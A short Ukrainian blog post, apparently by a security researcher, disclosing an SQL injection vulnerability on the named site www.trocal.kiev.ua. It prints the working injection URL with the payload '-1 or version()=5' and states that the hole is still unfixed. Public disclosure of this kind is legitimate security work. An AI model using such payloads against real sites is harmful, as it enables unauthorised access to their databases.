Уразливість на www.trocal.kiev.ua

19:21 11.10.2010

30.01.2010

У червні, 28.06.2009, я знайшов SQL Injection уразливість на сайті http://www.trocal.kiev.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

11.10.2010

SQL Injection:

http://www.trocal.kiev.ua/index.php?action=show&news_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.


Leave a Reply

:mrgreen: :| :twisted: :arrow: 8O :) :? 8) :evil: :D :idea: :oops: :P :roll: ;) :cry: :o :lol: :x :( :!: :?: